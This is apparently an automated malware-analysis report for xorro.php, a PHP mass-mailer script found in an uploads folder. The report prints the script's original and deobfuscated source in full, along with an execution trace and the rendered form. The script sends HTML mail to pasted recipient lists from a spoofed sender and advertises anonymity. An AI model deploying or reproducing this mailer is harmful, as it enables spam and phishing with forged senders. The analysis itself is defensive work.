xorro.php

md5: 129638b601316ea1e753f25d037a16b9

Jump to:
Deobfuscated code (Read more)
Execution traces (Read more)
Generated HTML (Read more)
Original Code (Read more)
Screenshot
Attributes
Emails
email@mail.ltd (Deobfuscated, HTML, Original)
reciepent@domain.ltd (Deobfuscated, HTML, Original)

Input
_POST (Deobfuscated, Original)

Deobfuscated PHP code
<?php

function clean($string)
{
    $bad = array("content-type", "bcc:", "to:", "cc:", "href");
    return str_replace($bad, "", $string);
}
?>
      <head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data">
              <tr><td><pre>Subject   : <input type="text" name="subject" required></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required></td></tr><br>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required></textarea></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required></textarea></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            </form>
          </table>
        </div>
      </body>
      <?php 
$subject = htmlspecialchars(trim(clean($_POST['subject'])));
$name = htmlspecialchars(trim(clean($_POST['form_name'])));
$mail = htmlspecialchars(trim(clean($_POST['from_email'])));
// $cc = htmlspecialchars(trim($_POST['cc']));
$mailist = explode("\r\n", htmlspecialchars(clean($_POST['mailist'])));
$letter = $_POST['letter'];
$headers = "MIME-Version: 1.0\r\n";
$headers = "MIME-Version: 1.0\r\nContent-type:text/html;charset=UTF-8\r\n";
$headers .= 'From: ' . $name . '<' . $mail . '>' . "\r\n";
$email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}$/';
if (isset($_POST['send'])) {
    echo "<pre style='padding-left: 30px; font-size: 15px;'>";
    foreach ($mailist as $mail) {
        if (!preg_match($email_exp, $mail)) {
            echo "Email <b>{$mail}</b> not valid.<br>";
        } else {
            echo "Sending to <b>{$mail}</b> -> ";
            if (@mail($mail, $subject, $letter, $headers)) {
                echo "<font color=#00FF00>SUCCESS</font><br>";
            } else {
                echo "<font color=#ff0000>FAILED</font><br>";
            }
        }
    }
    echo "</pre>";
}
Execution traces
data/traces/129638b601316ea1e753f25d037a16b9_trace-1676250366.7369.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-12 23:06:32.634730]
1	0	1	0.000149	393512
1	3	0	0.000253	408584	{main}	1		/var/www/html/uploads/xorro.php	0	0
2	4	0	0.000286	408584	clean	1		/var/www/html/uploads/xorro.php	26	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	5	0	0.000318	408584	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	5	1	0.000338	408680
3	5	R			''
2	4	1	0.000351	408584
2	4	R			''
2	6	0	0.000364	408584	trim	0		/var/www/html/uploads/xorro.php	26	1	''
2	6	1	0.000376	408616
2	6	R			''
2	7	0	0.000389	408584	htmlspecialchars	0		/var/www/html/uploads/xorro.php	26	1	''
2	7	1	0.000402	408776
2	7	R			''
1		A						/var/www/html/uploads/xorro.php	26	$subject = ''
2	8	0	0.000436	408744	clean	1		/var/www/html/uploads/xorro.php	27	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	9	0	0.000463	408744	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	9	1	0.000481	408840
3	9	R			''
2	8	1	0.000494	408744
2	8	R			''
2	10	0	0.000506	408744	trim	0		/var/www/html/uploads/xorro.php	27	1	''
2	10	1	0.000518	408776
2	10	R			''
2	11	0	0.000530	408744	htmlspecialchars	0		/var/www/html/uploads/xorro.php	27	1	''
2	11	1	0.000542	408936
2	11	R			''
1		A						/var/www/html/uploads/xorro.php	27	$name = ''
2	12	0	0.000569	408904	clean	1		/var/www/html/uploads/xorro.php	28	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	13	0	0.000595	408904	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	13	1	0.000613	409000
3	13	R			''
2	12	1	0.000626	408904
2	12	R			''
2	14	0	0.000638	408904	trim	0		/var/www/html/uploads/xorro.php	28	1	''
2	14	1	0.000650	408936
2	14	R			''
2	15	0	0.000662	408904	htmlspecialchars	0		/var/www/html/uploads/xorro.php	28	1	''
2	15	1	0.000674	409096
2	15	R			''
1		A						/var/www/html/uploads/xorro.php	28	$mail = ''
2	16	0	0.000701	409064	clean	1		/var/www/html/uploads/xorro.php	30	1	NULL
2		A						/var/www/html/uploads/xorro.php	2	$bad = [0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']
3	17	0	0.000728	409064	str_replace	0		/var/www/html/uploads/xorro.php	2	3	[0 => 'content-type', 1 => 'bcc:', 2 => 'to:', 3 => 'cc:', 4 => 'href']	''	NULL
3	17	1	0.000746	409160
3	17	R			''
2	16	1	0.000758	409064
2	16	R			''
2	18	0	0.000770	409064	htmlspecialchars	0		/var/www/html/uploads/xorro.php	30	1	''
2	18	1	0.000782	409256
2	18	R			''
2	19	0	0.000794	409224	explode	0		/var/www/html/uploads/xorro.php	30	2	'\r\n'	''
2	19	1	0.000807	409672
2	19	R			[0 => '']
1		A						/var/www/html/uploads/xorro.php	30	$mailist = [0 => '']
1		A						/var/www/html/uploads/xorro.php	31	$letter = NULL
1		A						/var/www/html/uploads/xorro.php	32	$headers = 'MIME-Version: 1.0\r\n'
1		A						/var/www/html/uploads/xorro.php	33	$headers .= 'Content-type:text/html;charset=UTF-8\r\n'
1		A						/var/www/html/uploads/xorro.php	34	$headers .= 'From: <>\r\n'
1		A						/var/www/html/uploads/xorro.php	35	$email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,4}$/'
1	3	1	0.000897	409536
			0.000922	316824
TRACE END   [2023-02-12 23:06:32.635534]

Generated HTML code
<html><head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <br><table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data"></form>
              <tbody><tr><td><pre>Subject   : <input type="text" name="subject" required=""></pre></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required=""></pre></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required=""></pre></td></tr>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required=""></textarea></pre></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required=""></textarea></pre></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            
          </tbody></table>
        </div>
      
      </body></html>
Original PHP code
<?php
function clean($string) {$bad = array("content-type","bcc:","to:","cc:","href");return str_replace($bad, "", $string);}?>
      <head>
        <meta charset="UTF-8"><meta name="author" content="Agus Setya R"><meta name="application-name" content="Mailer"><meta name="description" content="Send mail with this tools, be anonymous and send massive mail in one time."><meta name="viewport" content="width=device-width, initial-scale=1.0">
        <style type="text/css">
        html{background-color:#000000}.credit{color: #FFFFFF;font-family: monospace;font-size: 15px;position:absolute;;left:50%;bottom:0;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}html {margin: 10px auto;color: #FFFFFF;}h1 {font-size: 50px;text-align: center;margin: 0px auto;font-family: monospace;font-weight: lighter;}.mailer[type=text]{background: #FFFFFF;padding: 7px;margin: 5px auto;margin-left: 30px;border: 0;border-bottom: 1px solid #000000;color: #000000;width: 250px;height: 50px;font-family: monospace;font-size: 20px;}.btn {border-style: none;color: #FFFFFF;width: 90%;height: 50px;background-color: transparent;text-decoration: none;font-family: monospace;font-size: 20px;position:absolute;left:50%;transform:translate(-50%,0%);-ms-transform:translate(-50%,0%)}.btn:hover {cursor: default;text-decoration: none;background-color: #FFFFFF;color: #000000;}table {margin-left: 30px;font-size: 20px;}textarea {color: #000000;background: whitesmoke;padding: 5px;resize: none;border: 1px solid #000000;width: 550px;height: 250px;outline: none;font-family: monospace;font-size: 18px;}
        </style>
      </head>
      <body>
        <div>
          <h1>Mailer v0.1</h1>
          <table width="95%" align="center">
            <form class="mailer" method="post" enctype="multipart/form-data">
              <tr><td><pre>Subject   : <input type="text" name="subject" required></td></tr>
              <tr><td><pre>Name      : <input type="text" name="from_name" required></td></tr>
              <tr><td><pre>Email     : <input type="text" name="from_email" required></td></tr><br>
              <!-- <tr><td><pre>CC        : <input type="text" name="cc" placeholder="email@mail.ltd" required></td></tr><br> -->
              <tr><td><pre>Mail List : <br><textarea placeholder="reciepent@domain.ltd" name="mailist" required></textarea></td>
              <td><pre>Letter  : <br><textarea placeholder="HTML Script" name="letter" required></textarea></td></tr>
              <tr><td><input type="submit" class="btn" name="send" value="SEND"></td></tr>
            </form>
          </table>
        </div>
      </body>
      <?php
      $subject = htmlspecialchars(trim(clean($_POST['subject'])));
      $name = htmlspecialchars(trim(clean($_POST['form_name'])));
      $mail = htmlspecialchars(trim(clean($_POST['from_email'])));
      // $cc = htmlspecialchars(trim($_POST['cc']));
      $mailist = explode("\r\n", htmlspecialchars(clean($_POST['mailist'])));
      $letter = $_POST['letter'];
      $headers = "MIME-Version: 1.0" . "\r\n";
      $headers .= "Content-type:text/html;charset=UTF-8" . "\r\n";
      $headers .= 'From: '.$name.'<'.$mail.'>' . "\r\n";
      $email_exp = '/^[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}$/';
      if (isset($_POST['send'])) { echo "<pre style='padding-left: 30px; font-size: 15px;'>"; foreach ($mailist as $mail) { if (!preg_match($email_exp, $mail)) { echo "Email <b>$mail</b> not valid.<br>"; } else { echo "Sending to <b>$mail</b> -> ";if (@mail($mail, $subject, $letter, $headers)) { echo "<font color=#00FF00>SUCCESS</font><br>";}else { echo "<font color=#ff0000>FAILED</font><br>"; }} } echo "</pre>";}
PHP Malware Analysis

xorro.php

md5: 129638b601316ea1e753f25d037a16b9

Screenshot

Attributes

Deobfuscated PHP code

Execution traces

Generated HTML code

Original PHP code
